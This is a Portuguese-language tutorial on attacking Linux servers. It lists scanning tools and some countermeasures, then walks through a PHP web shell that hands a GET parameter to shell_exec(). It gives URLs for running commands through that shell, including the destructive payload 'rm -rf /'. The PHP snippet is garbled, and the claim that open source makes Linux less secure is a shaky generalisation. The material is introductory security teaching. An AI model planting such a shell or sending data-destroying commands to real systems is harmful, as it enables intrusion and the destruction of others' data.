Hackeando o sistema operacional Linux: Hacking com Ubuntu (Commands Tutorial)

Linux é o sistema operacional de servidor mais utilizado, especialmente para servidores web. É de código aberto; isto significa que qualquer pessoa pode ter acesso ao código fonte. Isto o torna menos seguro em comparação com outros sistemas operacionais, pois os atacantes podem estudar o código-fonte para encontrar vulnerabilidades. Linux para Hackers é sobre a exploração destas vulnerabilidades para obter acesso não autorizado a um sistema.

Neste artigo, vamos apresentar-lhe o que é o Linux, as suas vulnerabilidades de segurança, hacking com o Ubuntu e as contra medidas que você pode colocar em prática.

Tópicos abordados neste tutorial

  • Nota rápida sobre o Linux
  • Ferramentas de Hacking Linux
  • Como prevenir hacks do Linux
  • Actividade de Hacking: Hacking de um sistema Linux usando PHP

Nota rápida sobre Linux

Linux é um sistema operacional de código aberto. Existem muitas distribuições de sistemas operacionais baseados em Linux como Redhat, Fedora e Ubuntu, etc. Ao contrário de outros sistemas operativos, o Linux é menos seguro quando se trata de segurança. Isto porque o código fonte está disponível livremente, por isso é fácil estudá-lo por vulnerabilidades e explorá-las em comparação com outros sistemas operacionais que não são de código aberto. Linux pode ser usado como servidor, desktop, tablet ou sistema operacional de dispositivos móveis.

Os programas Linux podem ser operados usando GUI ou comandos. Os comandos Linux para hacking do Kali Linux são mais eficazes e eficientes em comparação ao uso da GUI. Por esta razão, ajuda a conhecer os comandos básicos do Linux para hacking.

Consulte estes tutoriais https://www.guru99.com/unix-linux-tutorial.html sobre como começar a usar os hacks do Kali Linux.

Ferramentas de hacking Linux

  • Nessus- esta ferramenta pode ser usada para hacking Ubuntu, configurações de scan, patches, e redes, etc. ela pode ser encontrada em https://www.tenable.com/products/nessus
  • NMap. Esta ferramenta pode ser usada para monitorar os hosts que estão rodando no servidor e os serviços que eles estão utilizando. Ela também pode ser usada para procurar por portas. Pode ser encontrada em https://nmap.org/
  • SARA – SARA é o acrónimo de Security Auditor’s Research Assistant. Como o nome indica, esta ferramenta pode ser usada para auditar redes contra ameaças como SQL Injection, XSS etc. Pode ser encontrada em http://www-arc.com/sara/sara.html

A lista acima não é exaustiva; dá-lhe uma ideia das ferramentas disponíveis para hacking Ubuntu e hacking de sistemas Linux.

Como prevenir hacks Linux

O hacking Linux tira partido das vulnerabilidades do sistema operativo. Uma organização pode adotar a seguinte política para se proteger contra tais ataques.

  • Patch management- patches corrigem bugs que os atacantes exploram para comprometer um sistema. Uma boa política de gerenciamento de patches irá garantir que você constantemente aplique patches relevantes ao seu sistema.
  • Configuração adequada do sistema operacional – outros exploits tiram vantagem dos pontos fracos na configuração do servidor. Nomes de usuários e daemons inativos devem ser desativados. Configurações padrão como senhas comuns para aplicativos, nomes de usuários padrão e alguns números de portas devem ser alterados.
  • Sistema de detecção de intrusão – tais ferramentas podem ser usadas para detectar acesso não autorizado ao sistema. Algumas ferramentas têm a capacidade de detectar e prevenir tais ataques.

Atividade de Hacking: Hackear um Sistema Ubuntu Linux usando PHP

Neste cenário prático, aprenderemos como hackear com o Ubuntu e lhe forneceremos informações básicas sobre como você pode usar o PHP para comprometer um Linux. Nós não vamos ter como alvo nenhuma vítima. Se você quiser experimentar, você pode instalar o LAMPP na sua máquina local.

O PHP vem com duas funções que podem ser usadas para executar comandos de hacking do Linux. Ele tem funções exec() e shell_exec(). A função exec() retorna a última linha da saída do comando enquanto a função shell_exec() retorna o resultado completo do comando como uma string.

Para fins de demonstração, vamos assumir que os gerenciadores de atacantes carregam o seguinte arquivo em um servidor web.

<?php$cmd = isset($_GET) ? $_GET : 'ls -l';echo "executing shell command:-> $cmd</br>";$output = shell_exec($cmd);echo "<pre>$output</pre>";?>

AQUI,

O script acima obtém o comando a partir da variável GET chamada cmd. O comando é executado usando shell_exec() e os resultados retornados no navegador.

O código acima pode ser explorado usando a seguinte URL

http://localhost/cp/konsole.php?cmd=ls%20-l

AQUI,

  • “…konsole.php?cmd=ls%20-l “atribui o valor ls -l à variável cmd.

O comando no Ubuntu para hacking contra o servidor será executado como

shell_exec('ls -l') ;

Executar o código acima em um servidor web dá resultados similares aos seguintes.

O comando acima simplesmente exibe os arquivos no diretório atual e as permissões

Vamos supor que o atacante passa o seguinte comando

rm -rf /

AQUI,

  • “rm” remove os ficheiros
  • “rf” faz o comando rm correr em modo recursivo. Apagar todas as pastas e ficheiros
  • “/” instrui o comando para começar a apagar ficheiros do directório raiz

A URL de ataque ficaria algo parecido com isto

http://localhost/cp/konsole.php?cmd=rm%20-rf%20/

Resumo

  • Linux é um sistema operativo popular para servidores, desktops, tablets e dispositivos móveis.
  • Linux é de código aberto, e o código fonte pode ser obtido por qualquer pessoa. Isto facilita a detecção das vulnerabilidades. É um dos melhores sistemas operacionais para hackers.
  • Os comandos básicos e de hacking de rede no Ubuntu são valiosos para hackers Linux.
  • As vulnerabilidades são uma fraqueza que pode ser explorada para comprometer um sistema.
  • Uma boa segurança pode ajudar a proteger um sistema de ser comprometido por um atacante.

Deixe uma resposta

O seu endereço de email não será publicado.